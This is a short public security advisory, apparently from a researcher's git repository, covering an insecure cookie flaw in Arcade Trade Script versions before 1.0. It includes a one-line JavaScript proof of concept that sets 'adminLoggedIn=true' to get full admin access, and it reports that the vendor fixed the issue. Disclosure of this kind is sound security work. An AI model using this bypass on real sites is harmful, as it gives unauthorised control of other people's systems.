arcade-trade-script-exploit.txt - advisories - Security advisories that I have released to the public.
(HTM) git clone git://jay.scot/advisories
(DIR) Log
(DIR) Files
(DIR) Refs
(DIR) README
---
arcade-trade-script-exploit.txt (1359B)
---
1
2
3 Arcade Trade Script
4 Insecure Cookie Handling
5 ===========================
6
7
8
9
10 SUMMARY
11 ________
12
13 Arcade Trade Script is a full arcade site CMS (Content Management System)
14 with easy customization and advanced traffic trading system built in.
15 With ATS you will hardly ever have to FTP anything. Almost all files,
16 pages, and meta tags can be edited from the admin panel. ATS is extremely
17 easy to use and works for both regular arcades and full blown traffic
18 trading arcades.
19
20 Please note that this issue has now been fixed!
21
22
23
24 IMPACT
25 _______
26
27 Leads to full administration rights on the CMS admin panel.
28
29
30
31 VERSIONS
32 _________
33
34 Vulnerable systems: ATS versions prior to 1.0
35
36 Immune systems: None
37
38
39
40 DESCRIPTION #1
41 ______________
42
43 Insecure cookie handling allows anyone to simply create a custom cookie
44 with the values below. This will allow full access to the admin panel.
45
46 Name - adminLoggedIn
47 Content - true
48 Path - /
49
50
51 Proof of Concept:
52 -> javascript:document.cookie="adminLoggedIn=true; path=/"
53
54 Fix:
55 -> None given.
56
57
58
59 ADDITIONAL INFO
60 _______________
61
62
63 Vendor URL - www.arcadetradescript.com
64 Underlying OS - Linux (Any), UNIX (Any), Windows (Any)
65 Credit - Jay Scott
66 Message History - Vendor notifyied and problem fixed
67 the following day.
68